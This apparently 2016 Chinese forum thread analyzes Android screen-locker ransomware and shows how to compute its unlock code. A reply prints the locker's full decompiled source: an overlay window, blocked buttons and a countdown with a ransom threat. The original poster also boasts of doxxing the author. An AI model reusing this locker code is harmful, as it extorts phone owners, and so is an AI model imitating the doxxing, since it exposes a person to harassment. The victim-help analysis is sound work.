记某锁机软件探索之旅
本帖最后由 蓦留 于 2016-6-5 15:43 编辑论坛见了个安卓锁机求助帖,这种帖子也司空见惯了,一直不能理解这种为啥有那么多人中招
明显的锁机软件嘛,还抱着侥幸贪小便宜的心态去用
PS:这种软件有一种共同特点,界面简陋至极,基本都是一个背景图,几个框有,的还有几个选项,使用时立马要root权限
好了正文
为了避免不适,看帖有不适的朋友请及时右上角
-------------------------------------------------------
1.apk解压发现asset文件夹有个ijm-x86.so,这个后缀改成apk,这个就是锁机软件咯,别问我为啥
看大神分析http://www.52pojie.cn/thread-492827-1-1.html
2.然后是反编译了,哦,没壳!新手一个,apk有壳我也不会脱{:1_907:}
然后看看java源码咯,大神的分析论坛很多,直接上图好了
然后发现s里边就可以找到解锁码算法了
恩,就是
this.pass = ((Math.random() * 100000000));
long l = this.pass + 99;
Long localLong = new Long(l);
this.passw = localLong;
其实其他部分也有用的,看大神文章分析吧,然后ta还有个PIN锁,密码:1314是释放的那个app激活后才有的,当然只要不脑残,不会给这软件激活的
恩,这个基本都会,我只是给那些一点也不知道的提供下流程
如果你觉得我只是为了写这个,
那就错了,
这只是个引子
重点是我闲的蛋疼去人肉这个作者
发现了 姓名 手机号 QQ号 微信号 优酷号 贴吧号...... 瞬间就震惊了,
作者你TM放这么多个人信息在网上你不怕人揍你去啊!!!
1.首先百度了下这个QQ
卧槽信息量太大有木有
百度信息量就超级大了
然后发现了这个
还有这个
其实百度信息量就超大了...具体自己探索,我就不多说了
咳咳原来你还有网站啊, whois反查信息量也蛮大的
看样子网站像是别人给建的看看其他吧
然后,进网站瞧瞧,哟,QQ 手机 姓名都有啊 啧啧
你说你那么多信息在网上,不怕勒索的人离你近的去揍你啊.
回帖奖励也没人回,CB收回来好了,可怜了税交过了...
纯属无聊闲的,如果违规的话麻烦管理告知下然后删帖
cfcanying 发表于 2016-6-7 16:37
https://yunpan.cn/cRfIJw8XFdeYt (提取码:1388)老是挂
给你代码自己看吧 有点不同 但差不多
package tk.jianmo.study;
import LogCatBroadcaster;
import android.app.Activity;
import android.app.AlertDialog.Builder;
import android.app.Dialog;
import android.app.DialogFragment;
import android.content.Context;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.os.SystemClock;
import android.text.Editable;
import android.view.KeyEvent;
import android.view.View;
import android.view.Window;
import android.widget.EditText;
import android.widget.TextView;
import android.widget.Toast;
import java.util.Timer;
import java.util.TimerTask;
public class MainActivity
extends Activity
{
Context context;
@Override
Intent intent;
int keyTouthInt = 0;
long newTime = 0;
int pas = (int)((Math.random() + 1) * 941214);
int pasJ;
int pasM = 3 * this.pas - 586782;
int pasT = 120;
SharedPreferences sp;
int theBeginTimeToFinish = 86400;
Timer timer;
TimerTask timertask;
int timetofinish = this.theBeginTimeToFinish;
TextView tv_pasM;
TextView tv_time;
long usedTime = 0;
public void exitLock(View paramView)
{
if (((EditText)findViewById(2131034114)).getText().toString().equals(String.valueOf(this.pas)))
{
Toast.makeText(this, "解锁成功!", 0).show();
System.exit(0);
return;
}
Toast.makeText(this, "密码错误!", 0).show();
}
public void keytouch(long paramLong, int paramInt1, int paramInt2)
{
this.newTime = System.currentTimeMillis();
if ((this.newTime - paramLong <= 2000) && (paramInt1 == paramInt2))
{
this.usedTime = this.newTime;
this.keyTouthInt = (paramInt1 + 1);
return;
}
this.keyTouthInt = 0;
}
public void onAttachedToWindow()
{
getWindow().setType(2009);
super.onAttachedToWindow();
}
public void onCreate(Bundle paramBundle)
{
LogCatBroadcaster.start(this);
super.onCreate(paramBundle);
requestWindowFeature(1);
getWindow().setFlags(-2147483648, -2147483648);
setContentView(2130903040);
this.context = this;
this.tv_time = ((TextView)super.findViewById(2131034112));
this.tv_pasM = ((TextView)findViewById(2131034113));
Intent localIntent1 = new Intent();
this.intent = localIntent1;
Intent localIntent2 = this.intent;
try
{
Class localClass = Class.forName("tk.jianmo.study.killpoccessserve");
localIntent2.setClass(this, localClass);
startService(this.intent);
this.sp = getSharedPreferences("TimeSave", 0);
this.timetofinish = this.sp.getInt("saveTime", this.timetofinish);
if (this.timetofinish <= 1) {
this.timetofinish = this.theBeginTimeToFinish;
}
Timer localTimer = new Timer();
this.timer = localTimer;
TimerTask local100000001 = new TimerTask()
{
@Override
public void run()
{
MainActivity localMainActivity = MainActivity.this;
Runnable local100000000 = new Runnable()
{
@Override
public void run()
{
int i = MainActivity.this.timetofinish / 3600;
int j = MainActivity.this.timetofinish % 3600 / 60;
int k = MainActivity.this.timetofinish % 60;
TextView localTextView = MainActivity.this.tv_time;
StringBuffer localStringBuffer1 = new StringBuffer();
StringBuffer localStringBuffer2 = new StringBuffer();
StringBuffer localStringBuffer3 = new StringBuffer();
StringBuffer localStringBuffer4 = new StringBuffer();
StringBuffer localStringBuffer5 = new StringBuffer();
localTextView.setText(localStringBuffer2.append(localStringBuffer3.append(localStringBuffer4.append(localStringBuffer5.append(i).append("时").toString()).append(j).toString()).append("分").toString()).append(k).toString() + "秒后手机硬盘被破坏,手机再过一天无解。解锁就加我吧!");
MainActivity.this.sp.edit().putInt("saveTime", MainActivity.this.timetofinish).commit();
if (MainActivity.this.timetofinish == -1)
{
MainActivity.this.stopService(MainActivity.this.intent);
System.exit(0);
}
MainActivity localMainActivity = MainActivity.this;
localMainActivity.timetofinish = (-1 + localMainActivity.timetofinish);
}
};
localMainActivity.runOnUiThread(local100000000);
}
};
this.timertask = local100000001;
this.timer.schedule(this.timertask, 0, 1000);
Handler local100000002 = new Handler()
{
public void handleMessage(Message paramAnonymousMessage)
{
String str = String.valueOf(MainActivity.this.pasM);
TextView localTextView = MainActivity.this.tv_pasM;
StringBuffer localStringBuffer1 = new StringBuffer();
StringBuffer localStringBuffer2 = new StringBuffer();
StringBuffer localStringBuffer3 = new StringBuffer();
StringBuffer localStringBuffer4 = new StringBuffer();
localTextView.setText(localStringBuffer2.append(localStringBuffer3.append(localStringBuffer4.append("序列号每120秒一更新,凭序列找作者要解锁密码,你的序列号是:").append(str).toString()).append(",序列号更新剩余时间还有:").toString()).append(MainActivity.this.pasT).toString() + "秒!");
super.handleMessage(paramAnonymousMessage);
}
};
Runnable local100000003 = new Runnable()
{
private final Handler val$pasHandler;
@Override
public void run()
{
for (;;)
{
if (MainActivity.this.pasT <= 0)
{
MainActivity.this.pas = ((int)((Math.random() + 1) * 941214));
MainActivity.this.pasM = (3 * MainActivity.this.pas - 586482);
MainActivity.this.pasT = 120;
}
MainActivity localMainActivity = MainActivity.this;
localMainActivity.pasT = (-1 + localMainActivity.pasT);
Handler localHandler1 = this.val$pasHandler;
Handler localHandler2 = this.val$pasHandler;
int i = MainActivity.this.pasT;
Integer localInteger = new Integer(i);
localHandler1.sendMessage(localHandler2.obtainMessage(22, localInteger));
long l = 1000;
try
{
Thread.sleep(l);
}
catch (InterruptedException localInterruptedException)
{
localInterruptedException.printStackTrace();
Toast.makeText(MainActivity.this, localInterruptedException.getMessage(), 0).show();
}
}
}
};
Thread localThread = new Thread(local100000003);
localThread.start();
return;
}
catch (ClassNotFoundException localClassNotFoundException)
{
NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
throw localNoClassDefFoundError;
}
}
@Override
public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent)
{
if (paramInt == 4)
{
Toast.makeText(this, "不要返回哦,再玩一会!", 0).show();
if (this.keyTouthInt != 0) {
break label208;
}
this.usedTime = SystemClock.currentThreadTimeMillis();
this.keyTouthInt = 1;
this.usedTime = System.currentTimeMillis();
}
for (;;)
{
if (paramInt == 3)
{
Toast.makeText(this, "HOME不管用了,手机正在休息!", 0).show();
keytouch(this.usedTime, this.keyTouthInt, 5);
if (this.keyTouthInt == 6)
{
MyDialogFragment localMyDialogFragment = new MyDialogFragment();
localMyDialogFragment.show(getFragmentManager(), "mydialog");
}
}
if (paramInt == 82)
{
Toast.makeText(this, "这儿没有菜单哦!", 0).show();
keytouch(this.usedTime, this.keyTouthInt, 100);
}
if (paramInt == 25)
{
Toast.makeText(this, "不用调节音量了,我会帮你静音!", 0).show();
keytouch(this.usedTime, this.keyTouthInt, 2);
}
if (paramInt == 24)
{
Toast.makeText(this, "音量太大会吵着别人哦!", 0).show();
keytouch(this.usedTime, this.keyTouthInt, 3);
}
if (paramInt == 26) {
Toast.makeText(this, "关机太慢了,直接扣电池吧!", 0).show();
}
return true;
label208:
if (this.keyTouthInt == 1) {
keytouch(this.usedTime, this.keyTouthInt, 1);
} else {
keytouch(this.usedTime, this.keyTouthInt, 4);
}
}
}
class MyDialogFragment
extends DialogFragment
{
public MyDialogFragment() {}
@Override
public Dialog onCreateDialog(Bundle paramBundle)
{
AlertDialog.Builder localBuilder = new AlertDialog.Builder(getActivity());
EditText localEditText = new EditText(MainActivity.this.context);
localEditText.setHint("please input the cipher!");
localBuilder.setView(localEditText);
localBuilder.setTitle("Choose");
localBuilder.setMessage("I will clear all of your data!");
DialogInterface.OnClickListener local100000004 = new DialogInterface.OnClickListener()
{
private final EditText val$edit;
@Override
public void onClick(DialogInterface paramAnonymousDialogInterface, int paramAnonymousInt)
{
if (this.val$edit.getText().toString().equals("586482"))
{
MainActivity.this.stopService(MainActivity.this.intent);
System.exit(0);
}
}
};
localBuilder.setPositiveButton("Yes", local100000004);
DialogInterface.OnClickListener local100000005 = new DialogInterface.OnClickListener()
{
@Override
public void onClick(DialogInterface paramAnonymousDialogInterface, int paramAnonymousInt) {}
};
localBuilder.setNegativeButton("No", local100000005);
return localBuilder.create();
}
}
}
cfcanying 发表于 2016-6-7 16:45
我就是 看到了 这个代码 不知道怎么算序列号 +1*941214 也错的
我也不太懂java语言,不过凭借C语言来大概理解了
展示的序列号是pasM
if (((EditText)findViewById(2131034114)).getText().toString().equals(String.valueOf(this.pas)))
{
Toast.makeText(this, "解锁成功!", 0).show();
System.exit(0);
根据上边这段可以知道输入的等于pas时解锁
下边这段是120秒重设序列号
if (MainActivity.this.pasT <= 0)
{
MainActivity.this.pas = ((int)((Math.random() + 1) * 941214));
MainActivity.this.pasM = (3 * MainActivity.this.pas - 586482);
MainActivity.this.pasT = 120;
}
根据这段可以知道 pas=((int)((Math.random() + 1) * 941214))
而pasM= (3 * MainActivity.this.pas - 586482)
展示的序列号是pasM
所以求pas就是逆运算
pas=(pasM+586482)/3
即解锁码=(序列号+586482)/3
{:1_927:}楼主好厉害,楼主真威武 每天学习争取进步! 这么说感觉是让作者注意安全 为他想得蛮周到啊。。 支持楼主! 榻榻米 发表于 2016-6-4 21:33
这么说感觉是让作者注意安全 为他想得蛮周到啊。。
不能说提醒吧,只能说这个作者一点也不担心别人现实中找到他,见过不少锁机软件勒索都用的小号,都是为了怕别人人肉,这个用大号,自然好查咯,还有刚设了回帖奖励,可以再回一贴试试运气哦{:301_997:} 楼主好厉害{:1_918:} 刚你一样我也是这么搞得,提醒小白安装软件是看清楚了,还有就是多看看论坛大神的教程 人肉技术不错